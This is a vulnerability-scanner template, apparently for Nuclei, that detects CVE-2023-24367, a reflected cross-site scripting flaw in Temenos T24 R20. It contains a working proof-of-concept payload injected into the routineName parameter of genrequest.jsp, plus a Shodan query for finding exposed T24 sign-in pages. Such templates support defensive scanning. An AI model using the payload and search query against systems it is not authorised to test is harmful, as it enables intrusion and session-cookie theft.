44 lines
1.7 KiB
YAML
44 lines
1.7 KiB
YAML
id: CVE-2023-24367
|
|
|
|
info:
|
|
name: Temenos T24 R20 - Cross-Site Scripting
|
|
author: r3Y3r53
|
|
severity: medium
|
|
description: |
|
|
Temenos T24 release 20 contains a reflected cross-site scripting vulnerability via the routineName parameter at genrequest.jsp. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
|
remediation: |
|
|
Apply the latest security patches or updates provided by the vendor to fix this vulnerability. Additionally, implement input validation and output encoding to prevent XSS attacks.
|
|
reference:
|
|
- https://github.com/mrojz/T24/blob/main/CVE-2023-24367.md
|
|
- https://github.com/mrojz/T24/blob/main/T24_XSS.md
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-24367
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2023-24367
|
|
cwe-id: CWE-79
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
shodan-query: title:"T24 Sign in"
|
|
tags: cve,cve2023,xss,temenos
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/jsps/genrequest.jsp?routineName="><script>alert(document.domain)</script>'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "<script>alert(document.domain)</script>"
|
|
- "<title>Processing...</title>"
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 490a004630440220254bd2edaad2242ac5ad5e52ab0d2c2768342e58f617707a85196f19dd84b04f02206c5c4f1d846b2ab90f04c8bbbc5179148d39886796f628f8545555dcea718a36:922c64590222798bb761d5b6d8e72950 |